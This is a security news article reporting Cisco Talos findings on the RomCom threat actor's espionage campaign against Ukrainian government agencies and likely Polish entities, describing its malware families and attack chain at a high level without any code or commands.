The Russian threat actor known as RomCom has been tied to a recent series of cyber attacks targeting Ukrainian government agencies and unidentified Polish entities since at least late 2023.
The breaches involve the use of a variant of the RomCom RAT called SingleCamper (also known as SnipBot or RomCom 5.0), according to Cisco Talos, who is tracking the activity cluster as UAT-5647.
“This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader,” noted security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura stated.
RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in multi-purpose operations such as ransomware, extortion, and targeted credential theft since it first appeared in 2022.
The pace of their attacks has reportedly accelerated in recent months, with a focus on establishing long-term control over compromised networks and extracting data, indicating a clear espionage agenda.
The threat actor is expanding its toolset and infrastructure to accommodate a variety of malware components written in different languages and platforms, including C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).
The attack sequence begins with a spear-phishing message that distributes a downloader in C++ (MeltingClaw) or Rust (RustyClaw), which then deploys ShadyHammock and DustyHammock backdoors. Simultaneously, a decoy document is presented to the recipient to maintain deception.
While DustyHammock communicates with a command-and-control (C2) server, executes commands, and downloads files, ShadyHammock serves as a platform for SingleCamper and listens for incoming directives.
Although ShadyHammock has additional functionalities, it is considered a precursor to DustyHammock, as the latter was observed in attacks as recently as September 2024.
SingleCamper, the latest iteration of RomCom RAT, carries out various post-compromise activities, including downloading PuTTY’s Plink tool to create remote tunnels with adversary-controlled infrastructure, network scanning, lateral movement, user and system identification, and data exfiltration.
“These specific attacks, targeting prominent Ukrainian entities, are likely part of UAT-5647’s dual strategy of establishing long-term access for espionage purposes and extracting data for as long as possible, with a potential shift to ransomware deployment for disruption and financial gain,” the researchers stated.
“It is probable that Polish entities were also targeted, based on the malware’s keyboard language checks.”
